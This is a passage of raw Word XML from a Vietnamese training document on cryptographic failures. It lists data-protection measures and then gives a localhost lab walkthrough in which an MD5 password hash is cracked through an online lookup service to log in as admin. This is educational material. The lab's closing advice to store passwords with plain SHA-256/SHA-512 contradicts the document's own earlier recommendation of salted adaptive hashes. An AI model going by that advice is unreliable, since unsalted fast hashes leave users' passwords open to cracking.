      <w:bookmarkStart w:id="14" w:name="_Toc182909831"/>
      <w:r>
        <w:t xml:space="preserve">Biện pháp </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>ngăn chặn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="5921AA8D" w14:textId="50C3849A" w:rsidR="0050178A" w:rsidRPr="00541D20" w:rsidRDefault="0050178A" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Phân loại dữ liệu được xử lý, lưu trữ, hoặc truyền bởi ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="004C7415" w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> Một công ty thương mại điện tử phân loại dữ liệu thành các nhóm như thông tin thanh toán (như số thẻ tín dụng), thông tin cá nhân (như địa chỉ và số điện thoại), và dữ liệu nhạy cảm (như lịch sử duyệt web). Việc phân loại này giúp công ty áp dụng các biện pháp bảo vệ phù hợp với mức độ nhạy cảm và tầm quan trọng của từng loại dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B742F4" w14:textId="717EC87A" w:rsidR="0050178A" w:rsidRPr="00541D20" w:rsidRDefault="0050178A" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Xác định dữ liệu nào là nhạy cảm theo các luật bảo mật, yêu cầu quy định, hoặc nhu cầu kinh doanh</w:t>
      </w:r>
      <w:r w:rsidR="004C7415" w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ: </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t>Trong một ứng dụng chăm sóc sức khỏe, dữ liệu nhạy cảm bao gồm hồ sơ y tế, kết quả xét nghiệm, và thông tin bảo hiểm sức khỏe. Ứng dụng cần xác định dữ liệu này và bảo vệ nó theo quy định hay tuân thủ bảo mật như Health Insurance Portability and Accountability Act (HIPAA) ở Hoa Kỳ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC2C84B" w14:textId="00D4694B" w:rsidR="004C7415" w:rsidRPr="00541D20" w:rsidRDefault="004C7415" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Áp dụng các biện pháp kiểm soát phù hợp theo phân loại.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> Công ty chỉ cho phép nhân viên bộ phận kế toán truy cập thông tin tài chính, trong khi nhân viên kỹ thuật chỉ có quyền truy cập thông tin liên quan đến bảo trì hệ thống. Đây là áp dụng nguyên tắc phân quyền phù hợp dựa trên phân loại dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABD6793" w14:textId="1EF4BA69" w:rsidR="004C7415" w:rsidRPr="00541D20" w:rsidRDefault="004C7415" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Không lưu trữ dữ liệu nhạy cảm không cần thiết.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> Một ứng dụng thương mại điện tử không lưu trữ số Card Verification Code (CVV) của thẻ tín dụng sau khi giao dịch hoàn tất, vì việc lưu trữ này là không cần thiết và tiềm ẩn nguy cơ bị đánh cắp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C4553D" w14:textId="3F11CC5B" w:rsidR="004C7415" w:rsidRPr="00541D20" w:rsidRDefault="004C7415" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Loại bỏ dữ liệu nhạy cảm càng sớm càng tốt hoặc sử dụng tokenization hay truncation tuân thủ PCI DSS.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> Sau khi xác thực thanh toán, hệ thống thanh toán thay thế số thẻ tín dụng bằng một token. Token này được sử dụng để đại diện cho số thẻ trong hệ thống, và không thể được sử dụng để thực hiện giao dịch mà không qua hệ thống của công ty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB7B99" w14:textId="0A1F7E2C" w:rsidR="004C7415" w:rsidRPr="00541D20" w:rsidRDefault="004C7415" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Đảm bảo mã hóa tất cả dữ liệu nhạy cảm tại trạng thái nghỉ.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ: </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t>Cơ sở dữ liệu của một ngân hàng sử dụng mã hóa AES-256 để bảo vệ thông tin khách hàng như số tài khoản và số dư khi dữ liệu được lưu trữ trong ổ cứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF1E42E" w14:textId="4F67E5C2" w:rsidR="004C7415" w:rsidRPr="00541D20" w:rsidRDefault="004C7415" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Đảm bảo rằng các thuật toán, giao thức và khóa tiêu chuẩn mạnh và cập nhật; sử dụng quản lý khóa phù hợp.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> Một công ty thay đổi khóa mã hóa mỗi năm và sử dụng quản lý khóa tập trung để đảm bảo các khóa mã hóa được cập nhật và quản lý đúng cách.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E57BF7" w14:textId="34B736AC" w:rsidR="0050178A" w:rsidRPr="00541D20" w:rsidRDefault="004C7415" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Mã hóa tất cả dữ liệu trong quá trình truyền tải với các giao thức bảo mật như TLS với mã hóa Perfect Forward Secrecy (PFS), ưu tiên mã hóa bởi máy chủ, và các tham số bảo mật</w:t>
      </w:r>
      <w:r w:rsidR="008A5DFB" w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> Một trang web ngân hàng trực tuyến sử dụng TLS 1.3 với PFS để mã hóa tất cả các giao dịch giữa trình duyệt của người dùng và máy chủ, đảm bảo dữ liệu không thể bị nghe trộm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21264F88" w14:textId="2CFAC78C" w:rsidR="008A5DFB" w:rsidRPr="00541D20" w:rsidRDefault="008A5DFB" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Buộc mã hóa bằng các chỉ thị như HTTP Strict Transport Security (HSTS).</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> Trang web của một tổ chức chính phủ bật HSTS để buộc tất cả kết nối từ trình duyệt người dùng phải sử dụng HTTPS, ngăn chặn các cuộc tấn công hạ cấp giao thức xuống HTTP không bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D52724" w14:textId="0F1F1F1D" w:rsidR="00E96EAE" w:rsidRPr="00541D20" w:rsidRDefault="00E96EAE" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vô hiệu hóa bộ nhớ đệm cho các phản hồi chứa dữ liệu nhạy cảm.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> Một ứng dụng tài chính vô hiệu hóa caching (caching là việc lưu trữ dữ liệu vào cache dưới dạng mã nhị phân, hay đây là quá trình lưu vào/lấy ra dữ liệu từ bộ nhớ đệm) cho các trang </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:lastRenderedPageBreak/>
        <w:t>hiển thị số dư tài khoản và lịch sử giao dịch để đảm bảo rằng thông tin này không bị lưu lại trên trình duyệt hay bộ nhớ cache của proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1DDD6" w14:textId="4AAD3141" w:rsidR="00E96EAE" w:rsidRPr="00541D20" w:rsidRDefault="00E96EAE" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Lưu trữ mật khẩu sử dụng các hàm băm mạnh, thích nghi và có </w:t>
      </w:r>
      <w:r w:rsidR="001A7605" w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r w:rsidR="001A7605" w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> với một hệ số trễ (delay factor), như Argon2, scrypt, bcrypt, hoặc PBKDF2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> Khi người dùng đăng ký tài khoản mới, hệ thống sử dụng bcrypt để băm mật khẩu của người dùng với một salt duy nhất và một hệ số chi phí cao, giúp tăng độ khó cho việc tấn công bẻ khóa mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E584B7A" w14:textId="4D5EBF23" w:rsidR="00E96EAE" w:rsidRPr="00541D20" w:rsidRDefault="00E96EAE" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Xác minh độc lập hiệu quả của cấu hình và thiết lập</w:t>
      </w:r>
      <w:r w:rsidR="001A7605" w:rsidRPr="00541D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ: </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t>Một công ty bảo mật thuê bên thứ ba thực hiện kiểm tra bảo mật định kỳ để đánh giá hiệu quả của các biện pháp mã hóa và cấu hình bảo mật hiện tại, đảm bảo rằng các cấu hình này vẫn phù hợp và an toàn trước các mối đe dọa mới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BE848D" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc182909832"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Kịch bản tấn công thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="18EFDA16" w14:textId="29530989" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc182909833"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="1461CE55" w14:textId="51ED863E" w:rsidR="00D12B8F" w:rsidRPr="00D12B8F" w:rsidRDefault="00D12B8F" w:rsidP="00D12B8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12B8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidRPr="00D12B8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/cryptographic_failure/lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="601DCAD6" w14:textId="483D35FC" w:rsidR="009D0400" w:rsidRPr="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t>Cryptographic Failures – Lab 1</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542938C7" w14:textId="434A9E50" w:rsidR="009D0400" w:rsidRPr="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t>Lỗi này xuất phát từ việc kẻ tấn công sử dụng “hash killer” để tìm kiếm và thu thập bảng dữ liệu băm (hashed) từ các hệ thống đã bị xâm nhập trước đó trên internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7413B7" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC15997" w14:textId="698C7DB1" w:rsidR="009D0400" w:rsidRPr="00366221" w:rsidRDefault="00541D20" w:rsidP="009D0400">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00541D20">
        <w:t>ruy cập vào task và dễ dàng thấy được thông tin đăng nhập gợi ý như sau:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve"> username: </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve"> và password là một </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00A45107">
        <w:t xml:space="preserve">đoạn chuỗi kí tự ở dạng băm MD5. </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00815B03">
        <w:t>Ý tưởng là sẽ giải mã đoạn chuỗi này với thuật toán băm MD5 để lấy được mật khẩu ở dạng bản rõ (plaintext).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A96DB15" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="0000434A" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="0000434A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB5D153" wp14:editId="702C04A3">
            <wp:extent cx="6115050" cy="2073275"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="932233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33706" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2073275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F9DAE" w14:textId="18C52219" w:rsidR="009D0400" w:rsidRPr="00366221" w:rsidRDefault="00815B03" w:rsidP="009D0400">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve">ùng </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.md5online.org/md5-decrypt.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve"> để kiểm tra password với chuỗi kí tự trên, kết quả là: </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730E903" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00B34D4A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63BAD6DA" wp14:editId="11D149EE">
            <wp:extent cx="6115050" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57862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2479" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3009900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EF2EED" w14:textId="3272B7CB" w:rsidR="009D0400" w:rsidRDefault="00815B03" w:rsidP="009D0400">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve">iến hành đăng nhập với </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00815B03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00815B03">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00815B03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00815B03">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>admin1234</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00366221">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00815B03">
        <w:t>và quan sát kết quả đăng nhập thành công như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534AE93" w14:textId="5E483391" w:rsidR="009D0400" w:rsidRPr="00366221" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00366221">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="250DF60C" wp14:editId="23A4E1E2">
            <wp:extent cx="3638737" cy="1505027"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37108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8119" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3638737" cy="1505027"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A081A" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00366221" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00366221">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="077A656F" wp14:editId="7D920DFD">
            <wp:extent cx="6115050" cy="1089025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="225105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05083" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1089025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8CEED3" w14:textId="0DC6DBD7" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00815B03" w:rsidRPr="00541D20">
        <w:t xml:space="preserve">High (cao) vì </w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="001F070A">
        <w:t>việc sử dụng các thuật toán băm yếu như MD5 cho phép kẻ tấn công dễ dàng giải mã để truy xuất mật khẩu gốc, dẫn đến nguy cơ xâm phạm dữ liệu và truy cập trái phép vào hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A45934" w14:textId="641B908B" w:rsidR="009D0400" w:rsidRPr="00815B03" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:t>Không nên sử dụng các thuật toán băm đời cũ như MD5 hay SHA-1 vì tính bảo mật kém, thay vào đó nên sử dụng các thuật toán băm đời mới và tiến tiến hơn như SHA-256 hay SHA-512 vì tính bảo mật cao hơn, an toàn hơn.</w:t>
      </w:r>
    </w:p>
